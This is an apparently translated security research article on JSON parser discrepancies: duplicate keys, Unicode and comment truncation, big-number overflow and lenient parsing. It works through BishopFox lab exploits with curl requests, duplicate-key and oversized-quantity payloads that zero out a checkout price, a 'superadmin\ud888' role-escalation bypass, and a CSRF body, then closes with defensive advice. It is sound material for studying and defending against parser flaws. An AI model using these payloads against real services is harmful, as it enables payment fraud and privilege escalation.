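JSON Parsing Discrepancies: A Risk Study

Introduction

In this article I share a technique: exploiting discrepancies in how different components parse JSON to create security risks.

Prerequisite: multiple components in the system parse the same JSON differently.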

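Starting with JSON

JSON (JavaScript Object Notation) is a lightweight data-interchange format that is easy for humans to read and write and easy for machines to parse and generate. It is widely used for data transfer, especially between clients and servers.

Although it originated in JavaScript, it has since become a general-purpose data format supported by many programming languages.

An example: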

{
  "name": "John Doe",
  "age": 30,
  "isEmployee": true,
  "address": {
    "street": "123 Main St",
    "city": "New York",
    "zipcode": "10001"
  },
  "phoneNumbers": ["123-456-7890", "987-654-3210"]
}

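JSON Parsing Security Issues

Before we begin, here are two conclusions:

  • The same JSON document can be parsed into different values by different microservices, which leads to a range of potential security risks.
  • Because of the first point, the more JSON parsers a system contains, the more potential security issues it has.

Root Cause

As with most problems, this one comes down to missing rules: because there is no strictly defined standard for parsing JSON, parsers behave differently, and those differences cause security problems.

The official JSON RFC itself gives only loose rules for some details, such as how to handle duplicate keys and how to represent numbers. Although the RFC includes interoperability caveats, most users of JSON parsers pay no attention to them.

Besides the official RFC, different parsers follow different specifications, for example: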

  • IETF JSON RFC (8259 and prior): official Internet Engineering Task Force (IETF) specification.
  • ECMAScript Standard: Changes to JSON are released in lockstep with RFC releases, and the standard refers to the RFC for guidance on JSON. However, non-spec conveniences provided by the JavaScript interpreter, such as quoteless strings and comments, have inspired many parsers.
  • JSON5: This superset specification augments the official specification by explicitly adding convenience features (e.g., comments, alternative quotes, quoteless strings, trailing commas).
  • HJSON: HJSON is similar to JSON5 in spirit with different design choices.
  • And others...

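Duplicate Keys (Precedence)

obj = {"a": 1, "a": 2}

Is the value of a 1 or 2?

Here is what the IETF JSON RFC (8259) says: https://datatracker.ietf.org/doc/html/rfc8259

In short, the RFC gives no definitive answer: object names SHOULD be unique, and when they are not, the behavior of the receiving software is unpredictable. Many implementations report only the last name/value pair, others report an error or fail to parse the object, and some report all name/value pairs, including duplicates.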
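Python's standard json module shows two of these behaviors: by default it keeps the last pair, and through its documented object_pairs_hook parameter it can hand back every pair, duplicates included. A minimal sketch:

```python
import json

raw = '{"a": 1, "a": 2}'

# Default behavior: the dict is built pair by pair, so the last value wins.
last_wins = json.loads(raw)
print(last_wins)  # {'a': 2}

# object_pairs_hook receives the list of (key, value) pairs for each object,
# so returning it unchanged exposes every pair, including the duplicate.
all_pairs = json.loads(raw, object_pairs_hook=lambda pairs: pairs)
print(all_pairs)  # [('a', 1), ('a', 2)]
```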

Reproduction lab: https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab1

We use this lab for the analysis.

  • Start the containers
docker-compose up -d
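  • Python handling with jsonschema (as in the lab's Flask service)
import json

import jsonschema

# Parse raw JSON text so that Python's json module (not the dict-literal
# syntax) decides which of the duplicate "qty" keys wins.
raw = """{
    "orderId": 10,
    "cart": [
        {"id": 0, "qty": 5},
        {"id": 1, "qty": -1, "qty": 1}
    ]
}"""

raw2 = """{
    "orderId": 10,
    "cart": [
        {"id": 0, "qty": 5},
        {"id": -10, "qty": 1}
    ]
}"""

schema = {
    "type": "object",
    "properties": {
        "orderId": {
            "type": "number",
            "maximum": 10,
        },
        "cart": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": "number",
                        "minimum": 0,
                        "exclusiveMaximum": 9  # len(productDB)-1
                    },
                    "qty": {
                        "type": "integer",
                        "minimum": 1
                    },
                },
                "required": ["id", "qty"],
            }
        }
    },
    "required": ["orderId", "cart"],
}

test_json = json.loads(raw)
res = jsonschema.validate(instance=test_json, schema=schema)
print(res)        # None: validate() returns None on success and raises on failure
print(test_json)  # {'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 1}]}

test_json2 = json.loads(raw2)
try:
    jsonschema.validate(instance=test_json2, schema=schema)
except jsonschema.ValidationError as err:
    print("rejected:", err.message)  # id -10 violates "minimum": 0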

  • As shown, Python keeps the value of the last (second) occurrence of a duplicated key.

  • Go handling (github.com/buger/jsonparser)
package main

import (
    "fmt"
    "github.com/buger/jsonparser"
)

func main() {
    jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": -1,
                "qty": 1
            }
        ]
    }`)

    // fmt.Println("data:", jsonData)

    jsonparser.ArrayEach(
        jsonData,
        func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
            id, _ := jsonparser.GetInt(value, "id")
            qty, _ := jsonparser.GetInt(value, "qty")
            fmt.Println("id:", id)
            fmt.Println("qty:", qty)
        },
    "cart")

}

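  • As shown, buger/jsonparser keeps the value of the first occurrence of a duplicated key.

  • The lab1 write-up exploits exactly this: the Python Flask service acts as the validation proxy, while the actual order calculation happens in the Go service.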

curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_req.json
# lab1_req.json
{
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}

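  • Result: the Go backend reads qty = -1 for item 1 (which the Python proxy validated as qty = 1) and charges 100*5 - 200 = 300.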
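To make the lab1 mismatch concrete without the containers, the sketch below simulates both services in Python: the default json.loads plays the last-wins proxy, and an object_pairs_hook that keeps the first value plays the first-wins Go backend. The unit prices (100 for id 0, 200 for id 1) are assumptions inferred only from the arithmetic above, and validate() is a simplified stand-in for the lab's schema, not its actual code.

```python
import json

RAW = '{"orderId": 10, "cart": [{"id": 0, "qty": 5}, {"id": 1, "qty": -1, "qty": 1}]}'

# Hypothetical unit prices, inferred only from the arithmetic 100*5 - 200 = 300.
PRICES = {0: 100, 1: 200}


def first_wins(pairs):
    """object_pairs_hook that keeps the FIRST value of a duplicated key."""
    obj = {}
    for key, value in pairs:
        obj.setdefault(key, value)
    return obj


def validate(order):
    """Simplified stand-in for the schema check: every qty must be >= 1."""
    return all(item["qty"] >= 1 for item in order["cart"])


def total(order):
    return sum(PRICES[item["id"]] * item["qty"] for item in order["cart"])


proxy_view = json.loads(RAW)                                  # last wins: qty == 1
backend_view = json.loads(RAW, object_pairs_hook=first_wins)  # first wins: qty == -1

print(validate(proxy_view))  # True: the proxy lets the order through
print(total(backend_view))   # 300: the backend charges for qty == -1
```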

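Character Truncation & Comments (Precedence)

Character truncation and comments can also be used to trigger parsing conflicts, increasing the number of parsers affected by duplicate-key precedence.

Character truncation

When certain characters appear in a string, some JSON libraries truncate the string while others do not. As a result, keys that look different can end up being treated as duplicates.

For example, the following payloads: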

{"test": 1, "test\[raw \x0d byte]": 2} 
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}
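  • Python 2.x Unicode encoding/decoding behavior (run in a Python 2 interactive shell)
import json
import ujson
# Serialization into illegal unicode: Python 2 encodes the lone surrogate without error.
u"asdf\ud800".encode("utf-8")

# Reserializing illegal unicode
json.dumps({"test": "asdf\xed\xa0\x80"})

# Third-party ujson handling a duplicate key that carries a lone surrogate
ujson.loads('{"test": 1, "test\\ud800": 2}')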

  • Python 3.x Unicode encoding/decoding behavior

In summary, Python 2 may allow such bypasses.
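For contrast, a minimal sketch of Python 3's behavior on the same kind of input, using only the standard library:

```python
import json

# Python 3 decodes the \ud800 escape into a lone surrogate and keeps it,
# so the two keys stay distinct and no collision happens.
doc = json.loads('{"test": 1, "test\\ud800": 2}')
print(len(doc))  # 2

# Python 3's strict UTF-8 codec refuses to encode a lone surrogate at all.
try:
    "asdf\ud800".encode("utf-8")
    encoded = True
except UnicodeEncodeError:
    encoded = False
print(encoded)  # False
```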

Reproducing lab2

https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab2

  • Create an admin user via /user/create (normal business logic)

{
    "user": "adminUser",
    "roles": ["superadmin"]
}
  • Creating an ordinary role succeeds

{"name": "simple"}
  • Bypass via Unicode parsing with superadmin\ud888

[root@localhost lab2]# cat role2.json 
{"name": "superadmin\ud888"}
  • Create exampleUser with the role superadmin\ud888
[root@localhost lab2]# curl localhost:5002/user/create -H "Content-Type: application/json" -d @user2.json
{"OK":"Created user 'exampleUser'"}

[root@localhost lab2]# cat user2.json 
{
    "user": "exampleUser",
    "roles": ["superadmin\ud888"]
}
  • Verify
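The lab's internals are not reproduced here. As a hypothetical model of this kind of bypass, assume the role check compares the decoded name exactly, while another component silently drops characters it cannot encode as UTF-8. Both function names below are illustrative only, not taken from the lab.

```python
import json

# Hypothetical check in the role-creation component: reserved names are blocked
# by exact comparison against the decoded JSON string.
RESERVED_ROLES = {"superadmin"}


def can_create_role(name):
    return name not in RESERVED_ROLES


# Hypothetical downstream component that silently drops characters it cannot
# encode as UTF-8 (here, the lone surrogate \ud888) before using the role name.
def normalize_role(name):
    return name.encode("utf-8", "ignore").decode("utf-8")


name = json.loads('{"name": "superadmin\\ud888"}')["name"]
print(can_create_role(name))  # True: the raw name is not exactly "superadmin"
print(normalize_role(name))   # superadmin
```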

Comment truncation

The examples below are adapted from the referenced research:

obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}

Results from different JSON libraries:

  • GoLang's GoJay library
description = "Duplicate with comments"
test = 2
extra = ""
  • Java's JSON-iterator library
description = "Duplicate with comments"
extra = "/*"
extra2 = "*/"
test = 1
Another payload:

obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}

Results from different JSON libraries:

  • Java’s GSON library
{"description":"Comment support","test":1,"extra":"a"}
  • Ruby’s simdjson library
{"description":"Comment support","test":2,"extra":"a","extra2":"b"}
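The two results above can be reproduced with two hypothetical preprocessing strategies in Python. This illustrates the divergence only; it is not how GSON or simdjson are actually implemented. Python's own json module rejects comments entirely.

```python
import json
import re

payload = '{"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}'

# A strict RFC parser rejects the comment outright.
try:
    json.loads(payload)
    strict_ok = True
except json.JSONDecodeError:
    strict_ok = False

# View A: treat /* ... */ as a comment and drop it (naive regex, ignores string contents).
view_a = json.loads(re.sub(r"/\*.*?\*/", "", payload, flags=re.S))

# View B: drop only the comment markers, so the "commented" pairs become real pairs
# and Python's last-wins rule applies to the duplicate "test".
view_b = json.loads(payload.replace("/*", "").replace("*/", ""))

print(strict_ok)  # False
print(view_a)     # {'description': 'Comment support', 'test': 1, 'extra': 'a'}
print(view_b)     # {'description': 'Comment support', 'test': 2, 'extra': 'a', 'extra2': 'b'}
```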

JSON Serialization Risks

Duplicate keys also matter during serialization, for example:

# Java's JSON-iterator

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 1
obj.toString() // {"test": 2}
# C++’s rapidjson

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 2
obj.toString() // {"test": 1, "test": 2}
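Whether a component forwards the original bytes or its own re-serialization therefore changes what downstream parsers see. A minimal Python sketch of the re-serialization path:

```python
import json

raw = '{"test": 1, "test": 2}'

# Parse with last-wins semantics, then serialize again: the duplicate is gone.
reserialized = json.dumps(json.loads(raw))
print(reserialized)  # {"test": 2}

# A component that forwards `raw` unchanged passes both pairs downstream,
# whereas one that forwards `reserialized` commits every consumer to test == 2.
print(raw == reserialized)  # False
```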

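Integer and Float Parsing

First, the official wording: the RFC explicitly notes that number handling may be inconsistent. It allows implementations to limit the range and precision of the numbers they accept, and notes that, with IEEE 754 double-precision implementations, only integers in the range [-(2**53)+1, (2**53)-1] are interoperable.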

Large numbers

# input
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

# possible outputs
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807
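The sketch below reproduces several of these outcomes in Python. Python's json module itself returns an exact int; parse_int=float mimics a double-only parser such as JavaScript's, while clamp_int64 and int64_or_zero are hypothetical helpers modeling parsers that saturate at int64 or return 0 on overflow.

```python
import json

BIG = "9" * 96  # 96 nines (10**96 - 1), standing in for the number above

as_int = json.loads(BIG)                     # Python: exact arbitrary-precision int
as_float = json.loads(BIG, parse_int=float)  # double-only parser, like JavaScript
print(as_float)  # 1e+96

INT64_MIN, INT64_MAX = -(2**63), 2**63 - 1


def clamp_int64(n):
    """Hypothetical parser that saturates at the int64 limits."""
    return max(INT64_MIN, min(n, INT64_MAX))


def int64_or_zero(n):
    """Hypothetical parser that yields 0 when the value overflows int64."""
    return n if INT64_MIN <= n <= INT64_MAX else 0


print(clamp_int64(as_int))    # 9223372036854775807
print(int64_or_zero(as_int))  # 0

# Doubles lose integer precision long before overflow: 2**53 + 1 is not representable.
precision_lost = json.loads("9007199254740993", parse_int=float)
print(precision_lost)  # 9007199254740992.0
```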

Examples:

  • Python 3 demo
[root@localhost json-interop-vuln-labs_test]# python3 python_json.py 
None
{'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}]}

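Python 3 handles the big number correctly (its int type has arbitrary precision).

  • Go demo (the same program as above, with this input)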
jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
            }
        ]
    }`)

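Go (buger/jsonparser) parses the big number as 0, presumably because GetInt fails with an overflow error that the demo ignores.

  • A second solution to lab1: the huge qty passes the Python schema check (it is an integer >= 1), but the Go backend reads it as 0, so the order costs nothing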
[root@localhost lab1]# cat lab1_alt_req.json 
{
        "orderId": 10,
        "cart": [
        {
            "id": 8,
            "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
        }
    ]
}
[root@localhost lab1]# curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
Receipt:
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999x $100 E-Gift Card @ $100/unit

Total Charged: $0
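  • One last special case: large numbers overflowing to infinity

The RFC states that numeric values that cannot be represented in the JSON number grammar (such as Infinity and NaN) are not permitted.

However, the RFC does not say what a parser should do with a grammatically valid number that overflows (such as 1.0e4096), and many parsers accept non-standard literals anyway, so possible inputs include: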

{"description":"Big float","test":1.0e4096}
{"description":"Big float","test":Infinity}
{"description":"Big float","test":"+Infinity"}
{"description":"Big float","test":null}
{"description":"Big float","test":Inf}
{"description":"Big float","test":3.0e14159265358979323846}
{"description":"Big float","test":9.218868437227405E+18}
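Python's json module is a convenient example of this non-standard behavior: it turns 1.0e4096 into inf, accepts the Infinity literal, and even emits it when serializing. Its documented parse_constant and allow_nan parameters can be used to refuse these. A sketch:

```python
import json

# A grammatically valid number that overflows a double becomes inf.
big = json.loads('{"description":"Big float","test":1.0e4096}')["test"]
print(big)  # inf

# Python also accepts the non-standard Infinity literal...
inf_literal = json.loads('{"description":"Big float","test":Infinity}')["test"]
print(inf_literal)  # inf

# ...and emits it when serializing, producing output a strict parser rejects.
dumped = json.dumps({"test": float("inf")})
print(dumped)  # {"test": Infinity}


def reject_constant(name):
    raise ValueError(f"non-standard JSON constant: {name}")


# parse_constant is only called for Infinity, -Infinity and NaN;
# an overflowing number like 1.0e4096 goes through parse_float instead.
try:
    json.loads('{"test":Infinity}', parse_constant=reject_constant)
    constant_rejected = False
except ValueError:
    constant_rejected = True

# allow_nan=False makes json.dumps refuse inf and nan.
try:
    json.dumps({"test": float("inf")}, allow_nan=False)
    dump_rejected = False
except ValueError:
    dump_rejected = True

print(constant_rejected, dump_rejected)  # True True
```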

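# php demo (PHP 7.x; since PHP 8, 0 == "Infinity" compares as strings and yields False)
<?php
echo (0 == 1.0e4096 ? "True" : "False") . "\n"; # False: 1.0e4096 overflows to INF
echo (0 == "Infinity" ? "True" : "False") . "\n"; # True on PHP 7: "Infinity" is cast to 0
?>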

Lenient JSON Parsing

In short, some JSON parsers strictly enforce the RFC grammar, while others tolerate "odd" characters.

  • In CSRF attacks
POST /update_XXX HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded

{"testlaitie233": 1}=

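This is why some such payloads work: the trailing "=" makes the body invalid strict JSON, so it is only accepted by a server that parses the body as JSON despite the form Content-Type and by a parser that tolerates extra trailing data.

This area is well suited to fuzz testing.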
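Python can show both behaviors on this CSRF body: json.loads is strict and rejects the trailing "=", while JSONDecoder.raw_decode parses the first JSON value and reports where it stopped, which is effectively what a lenient parser does when it ignores trailing data.

```python
import json

body = '{"testlaitie233": 1}='

# Strict parsing: anything after the first JSON value is an error.
try:
    json.loads(body)
    strict_ok = True
except json.JSONDecodeError as exc:
    strict_ok = False
    print("strict parser rejects:", exc.msg)  # strict parser rejects: Extra data

# raw_decode() parses one JSON value and returns the index where it stopped,
# which is how a lenient parser can silently ignore the trailing "=".
obj, end = json.JSONDecoder().raw_decode(body)
print(obj, repr(body[end:]))  # {'testlaitie233': 1} '='
```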

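Defense

Defense should be considered from two angles: JSON library developers and ordinary developers who use those libraries.

  • JSON library developers: strictly follow the RFC and handle the edge cases described in this article.
  • Ordinary developers (consumers): inventory every parser in your architecture and enforce strict JSON Schema validation against these edge cases.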
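As one possible starting point for consumers, here is a sketch of a stricter loader built on Python's json hooks. It rejects the edge cases covered above: duplicate keys, keys with lone surrogates, integers outside the RFC's interoperable range, overflowing floats, and Infinity/NaN. The function names are illustrative, and the checks are an assumption about what "strict" should mean for a given system.

```python
import json
import math

MAX_SAFE_INT = 2**53 - 1  # RFC 8259's interoperable integer range is +/-(2**53 - 1)


def _check_pairs(pairs):
    """Build an object, rejecting duplicate keys and keys with lone surrogates."""
    obj = {}
    for key, value in pairs:
        if any(0xD800 <= ord(ch) <= 0xDFFF for ch in key):
            raise ValueError(f"lone surrogate in key: {key!r}")
        if key in obj:
            raise ValueError(f"duplicate key: {key!r}")
        obj[key] = value
    return obj


def _safe_int(text):
    value = int(text)
    if abs(value) > MAX_SAFE_INT:
        raise ValueError(f"integer outside interoperable range: {text}")
    return value


def _finite_float(text):
    value = float(text)
    if math.isinf(value):
        raise ValueError(f"number overflows to infinity: {text}")
    return value


def _reject_constant(name):
    raise ValueError(f"non-standard constant: {name}")


def strict_loads(text):
    """json.loads plus the checks above; comments, trailing commas and
    trailing data are already rejected by Python's json module."""
    return json.loads(
        text,
        object_pairs_hook=_check_pairs,
        parse_int=_safe_int,
        parse_float=_finite_float,
        parse_constant=_reject_constant,
    )
```

String values (such as the role name in lab2) are not checked for lone surrogates here and would need a similar pass. One design choice worth considering is for the validating layer to forward json.dumps(strict_loads(body)) instead of the raw body, so downstream parsers receive exactly what was validated.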

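Final Thoughts

This article introduced a class of security issues caused by JSON parsing discrepancies. In real environments, you need to analyze carefully where the JSON parsers involved differ and where they agree.

Many CVEs in the past have stemmed from the same root cause.

References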

https://bishopfox.com/blog/json-interoperability-vulnerabilities

https://portswigger.net/daily-swig/research-how-json-parsers-can-create-security-risks-when-it-comes-to-interoperability

https://github.com/BishopFox/json-interop-vuln-labs/
